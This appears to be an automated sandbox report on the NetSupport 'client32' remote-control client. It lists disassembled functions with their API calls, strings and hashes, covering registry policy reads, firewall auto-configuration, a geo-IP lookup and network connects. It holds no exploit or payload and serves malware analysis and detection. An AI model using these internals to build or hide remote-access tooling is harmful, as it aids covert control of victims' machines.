Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
API String ID: 3298063328-2190704750
Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52

Function 11084F50 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,7E4636A2,02566C50,02566C40,?,00000000,1117ED9C,000000FF,?,11031392,02566C50,00000000,?,?,?), ref: 11084F85

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
wsprintfA.USER32 ref: 1108505B
wsprintfA.USER32 ref: 11085072
wsprintfA.USER32 ref: 11085089
CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA

Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BD8
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BEB
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BFE
Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084C11

Strings

Cancel, xrefs: 11084FB9
GetInventoryEx, xrefs: 11084FC7
%s_SW.%s, xrefs: 1108506C
%s_HW.%s, xrefs: 11085052
%s_HF.%s, xrefs: 11085083
PCIINV.DLL, xrefs: 11084F80
GetInventory, xrefs: 11084FA5

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 3281479988-2492245516
Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91

Function 1102FF34 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D

Strings

_debug\tracefile, xrefs: 1102FFDB
/247, xrefs: 11030098
istaUI, xrefs: 1102FF8F
SetProcessDPIAware, xrefs: 11030103
_debug\trace, xrefs: 1102FFCA
PCIMutex, xrefs: 11030064, 11030083
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1102FFB0

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62

Function 11027E10 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

wsprintfA.USER32 ref: 11027E84
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
wsprintfA.USER32 ref: 11027F01
CloseHandle.KERNEL32(?), ref: 11027F17
CloseHandle.KERNEL32(?), ref: 11027F20
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95

Strings

pcicl32_res.dll, xrefs: 11027F59
", xrefs: 11027E5A
SetClientResLang called, gPlatform %x, xrefs: 11027E2C
\GetUserLang.exe", xrefs: 11027E7E
Locales\%d\, xrefs: 11027EF1
Setting resource langid=%d, xrefs: 11027F41

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-1744591295
Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0

Function 1102C030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
GetTickCount.KERNEL32 ref: 1102C09A

Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A

GetTickCount.KERNEL32 ref: 1102C194

Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB

Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
CloseHandle.KERNEL32(?), ref: 1102C2A8

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C2D9, 1102C2ED, 1102C301, 1102C315
GeoIP, xrefs: 1102C0E3
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C0B5
LatLong, xrefs: 1102C058, 1102C145
IsA(), xrefs: 1102C2DE, 1102C2F2, 1102C306, 1102C31A
?IP=%s, xrefs: 1102C126
GetLatLong=%s, took %d ms, xrefs: 1102C1B1
_debug, xrefs: 1102C0E8, 1102C14A

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61

Function 11060CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA

Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
RegCloseKey.ADVAPI32(?), ref: 11060E21

Strings

Client, xrefs: 11060D08, 11060E38
Client, xrefs: 11060D9A
DisableUserPolicies, xrefs: 11060E33
Software\Policies\NetSupport, xrefs: 11060D9F
Software\Policies\NetSupport\Client\Standard, xrefs: 11060D0D
%s\%s\%s\, xrefs: 11060DA4
Standard, xrefs: 11060D66
Software\Policies\NetSupport\Client, xrefs: 11060CF4
Client.%04d.%s, xrefs: 11060D87

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5

Function 11134AC0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11134B22

Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

GetTickCount.KERNEL32 ref: 11134B31
_memset.LIBCMT ref: 11134B73
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
_strrchr.LIBCMT ref: 11134B98
_free.LIBCMT ref: 11134BEA

Strings

Client, xrefs: 11134AFC
ICFConfig, xrefs: 11134AD5
ICFConfig2 returned 0x%x, xrefs: 11134BF0
No ICF present, xrefs: 11134C22
IsICFPresent..., xrefs: 11134B0F
*AutoICFConfig, xrefs: 11134AF7
IsICFPresent() took %d ms, xrefs: 11134B3D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1

Function 68597610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 68597642
connect.WSOCK32(00000000,?,?), ref: 68597659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 68597660
_memmove.LIBCMT ref: 685976D3
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 685976F3
GetTickCount.KERNEL32 ref: 68597717
ioctlsocket.WSOCK32 ref: 6859775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68597762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6859777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6859778B

Strings

General, xrefs: 68597683
ConnectTimeout, xrefs: 6859767E
*BlockingIO, xrefs: 68597732

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
Instruction ID: 30e65d9f3c13ca9ba06203294eaad4451362e010f8f7e2b579c452b5405bcc0f
Opcode Fuzzy Hash: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
Instruction Fuzzy Hash: 1441EB759403149BEB20DF64CC48BEEB3BAEF84305F8044AAE90997181EB705E58CFA1

Function 11131260 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
GetSystemMetrics.USER32(00000021), ref: 111312C9
GetSystemMetrics.USER32(0000000F), ref: 111312D1
GetSystemMetrics.USER32(00000004), ref: 111312D7
GetDC.USER32(00000000), ref: 111312E3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
ReleaseDC.USER32(00000000,00000000), ref: 111312FA
CreateWindowExA.USER32(00000001,NSMWClass,025508A0,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357

Strings

mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 1113130E
CreateMainWnd, hwnd=%x, e=%d, xrefs: 1113135F
NSMWClass, xrefs: 11131349

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
